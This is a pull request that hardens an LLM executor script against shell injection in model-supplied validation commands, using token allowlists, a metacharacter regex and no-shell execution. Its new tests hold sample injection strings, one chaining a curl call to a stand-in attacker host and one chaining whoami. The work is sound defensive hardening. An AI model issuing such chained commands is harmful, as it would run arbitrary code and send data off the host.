### PR TITLE
Harden hosted LLM validation command execution

### DIFF
--- a/scripts/autonomy/hosted_llm_executor.py
+++ b/scripts/autonomy/hosted_llm_executor.py
@@ -4,6 +4,7 @@ import argparse
 import json
 import os
 import re
+import shlex
 import subprocess
 import textwrap
 import urllib.error
@@ -62,20 +63,24 @@ AREA_CONTEXT = {
     ],
 }
 
-ALLOWED_COMMAND_PREFIXES = (
-    'python ',
-    'python3 ',
-    'npm ',
-    'npx ',
-    'ruff ',
-    'black ',
-    './.venv/bin/python ',
-    'git status',
-    'git diff',
-)
+ALLOWED_EXECUTABLES = {
+    'python',
+    'python3',
+    'npm',
+    'npx',
+    'ruff',
+    'black',
+    './.venv/bin/python',
+}
+
+ALLOWED_GIT_COMMANDS = {
+    ('git', 'status'),
+    ('git', 'diff'),
+}
 
 DEFAULT_MAX_PATCH_BYTES = 50000
 DEFAULT_MAX_CHANGED_FILES = 6
+SHELL_METACHAR_PATTERN = re.compile(r'[;&|`<>$\n\r]')
 
 
 def run(command: list[str], *, check: bool = True) -> subprocess.CompletedProcess[str]:
@@ -296,17 +301,30 @@ def apply_patch_text(patch_text: str) -> None:
     run(['git', 'apply', str(patch_path)])
 
 
-def validate_commands(commands: list[str]) -> list[str]:
-    allowed = []
+def validate_commands(commands: list[str]) -> list[list[str]]:
+    allowed: list[list[str]] = []
     for command in commands[:3]:
-        if any(command.startswith(prefix) for prefix in ALLOWED_COMMAND_PREFIXES):
-            allowed.append(command)
+        if SHELL_METACHAR_PATTERN.search(command):
+            continue
+        try:
+            argv = shlex.split(command)
+        except ValueError:
+            continue
+        if not argv:
+            continue
+
+        if argv[0] in ALLOWED_EXECUTABLES:
+            allowed.append(argv)
+            continue
+
+        if tuple(argv[:2]) in ALLOWED_GIT_COMMANDS and len(argv) == 2:
+            allowed.append(argv)
     return allowed
 
 
-def run_validation(commands: list[str]) -> None:
+def run_validation(commands: list[list[str]]) -> None:
     for command in commands:
-        subprocess.run(['bash', '-lc', command], check=True)
+        subprocess.run(command, check=True)
 
 
 def main() -> int:

--- a/tests/test_hosted_llm_executor.py
+++ b/tests/test_hosted_llm_executor.py
@@ -1,0 +1,36 @@
+from __future__ import annotations
+
+import importlib.util
+from pathlib import Path
+
+
+MODULE_PATH = Path(__file__).resolve().parents[1] / 'scripts' / 'autonomy' / 'hosted_llm_executor.py'
+SPEC = importlib.util.spec_from_file_location('hosted_llm_executor', MODULE_PATH)
+MODULE = importlib.util.module_from_spec(SPEC)
+assert SPEC is not None and SPEC.loader is not None
+SPEC.loader.exec_module(MODULE)
+
+
+def test_validate_commands_rejects_shell_injection() -> None:
+    commands = [
+        "python -m compileall src/api; curl https://attacker.invalid",
+        'git status && whoami',
+        'echo harmless',
+    ]
+
+    assert MODULE.validate_commands(commands) == []
+
+
+def test_validate_commands_accepts_expected_commands() -> None:
+    commands = [
+        'python -m compileall src/api',
+        'git status',
+        'git diff',
+        'npm test',
+    ]
+
+    assert MODULE.validate_commands(commands) == [
+        ['python', '-m', 'compileall', 'src/api'],
+        ['git', 'status'],
+        ['git', 'diff'],
+    ]


### PR DESCRIPTION
### Motivation
- The hosted LLM executor accepted model-supplied `validation_commands` by checking only string prefixes and then running them with `bash -lc`, which allowed shell metacharacter injection such as `python ...; curl ...` to execute arbitrary commands. 
- The change aims to close this allowlist-bypass while preserving the intended ability to run a small set of safe, repo-native validation commands.

### Description
- Replace prefix-based allowlist with explicit tokenized allowlists: `ALLOWED_EXECUTABLES` and `ALLOWED_GIT_COMMANDS` in `scripts/autonomy/hosted_llm_executor.py`.
- Validate commands by tokenizing with `shlex.split` and reject any input containing common shell metacharacters via `SHELL_METACHAR_PATTERN`.
- Change `validate_commands` to return argv lists and change `run_validation` to call `subprocess.run(argv, check=True)` (no `bash -lc` / no shell execution).
- Add `tests/test_hosted_llm_executor.py` with regression tests that reject injected commands and accept expected allowlisted commands.

### Testing
- Ran inline module assertions by importing `scripts/autonomy/hosted_llm_executor.py` and exercising `validate_commands` which succeeded (`python - <<'PY' ...` assertions passed).
- Ran `python -m compileall scripts/autonomy/hosted_llm_executor.py tests/test_hosted_llm_executor.py` which succeeded to confirm compilation.
- Attempted `pytest -q tests/test_hosted_llm_executor.py` but it could not complete in this environment due to a missing test dependency (`pytest_asyncio` imported by `tests/conftest.py`).

------
[Codex Task](https://chatgpt.com/codex/tasks/task_e_69b5b34400f4832a83a0675968167247)